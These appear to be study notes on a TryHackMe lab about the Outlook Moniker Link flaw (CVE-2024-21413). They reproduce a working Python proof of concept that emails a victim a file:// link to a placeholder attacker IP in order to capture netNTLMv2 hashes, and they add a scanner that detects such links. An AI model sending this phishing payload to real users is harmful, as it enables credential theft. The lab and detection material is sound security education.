Moniker Link (CVE-2024-21413)

https://tryhackme.com/r/room/monikerlink

What does it do:

An unwilling victim clicks on a link in Outlook (the affected versions are shown below). This simple act will send the attacker the netNTLMv2 hash of the victim's

How does it work:

The link contains the address of the attacker. By clicking on it, you initiate a connection over the SMB (Server Message Block) protocol, which is used for file sharing by Windows, Linux etc., potentially triggering an NTLMv2 authentication request. In simple terms, Outlook thinks you want to access files someone sent you and does what it's supposed to do.

The vulnerability is known to affect the following Office releases:

| Release | Version |
| --- | --- |
| Microsoft Office LTSC 2021 | affected from 19.0.0 |
| Microsoft 365 Apps for Enterprise | affected from 16.0.1 |
| Microsoft Office 2019 | affected from 16.0.1 |
| Microsoft Office 2016 | affected from 16.0.0 before 16.0.5435.1001 |

'''
Author: CMNatic | https://github.com/cmnatic
Version: 1.1 | 13/03/2024
Only run this on systems that you own or are explicitly authorised to test (in writing). Unauthorised scanning, testing or exploitation is illegal.
'''

import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

sender_email = 'attacker@monikerlink.thm' # Replace with your sender email address
receiver_email = 'victim@monikerlink.thm' # Replace with the recipient email address
password = input("Enter your attacker email password: ")
html_content = """\
<!DOCTYPE html>
<html lang="en">
    <p><a href="file://Change_this_to_ATTACKER_IP/test!exploit">Click me</a></p>

    </body>
</html>"""

message = MIMEMultipart()
message['Subject'] = "CVE-2024-21413"
message["From"] = formataddr(('CMNatic', sender_email))
message["To"] = receiver_email

# Wrap the HTML string in a text/html MIME part and attach it to the message object
msgHtml = MIMEText(html_content,'html')
message.attach(msgHtml)

server = smtplib.SMTP('Change_this_to_MAILSVERIP', 25)
server.ehlo()
try:
    server.login(sender_email, password)
except Exception as err:
    print(err)
    exit(-1)

try:
    server.sendmail(sender_email, [receiver_email], message.as_string())
    print("\nEmail delivered")
except Exception as error:
    print(error)
finally:
    server.quit()
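
One way to spot this link shape in inbound mail, as an added example that is not part of the original notes or of CMNatic's script: it parses a message, pulls the anchor hrefs out of its HTML parts, and flags `file://` URLs that name a remote host, marking those with a `!` in the path like the link above. The sample message, its host names and the function names are constructed for illustration.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Constructed sample message (not real mail); hosts are documentation placeholders.
SAMPLE_EML = """\
From: sender@example.test
Subject: constructed sample
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<a href="file://fileserver.example.test/share/report.docx">plain UNC link</a>
<a href="FILE://192.0.2.10/test!exploit">moniker-style link</a>
<a href="file:///C:/Users/user/notes.txt">local file</a>
<a href="https://example.test/a!b">web link</a>
</body></html>
"""

class _Hrefs(HTMLParser):
    """Collect the href value of every <a> tag."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs += [v for k, v in attrs if k == "href" and v]

def classify(href):
    """Return 'moniker', 'remote-file' or None for one href value."""
    url = urlsplit(unquote(href.strip()).replace("\\", "/"))
    if url.scheme.lower() != "file" or not url.netloc:
        return None  # not file://, or no remote host (local path)
    # A remote file:// link already causes an SMB connection; '!' marks the moniker form.
    return "moniker" if "!" in url.path else "remote-file"

def scan_message(raw):
    """List (verdict, href) for every remote file:// link in the HTML parts."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        parser = _Hrefs()
        parser.feed(part.get_content())
        findings += [(v, h) for h in parser.hrefs if (v := classify(h))]
    return findings
```

`scan_message(SAMPLE_EML)` reports the two remote `file://` links and ignores the local path and the web link; percent-encoded and backslash forms of the same link are normalised before the check.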
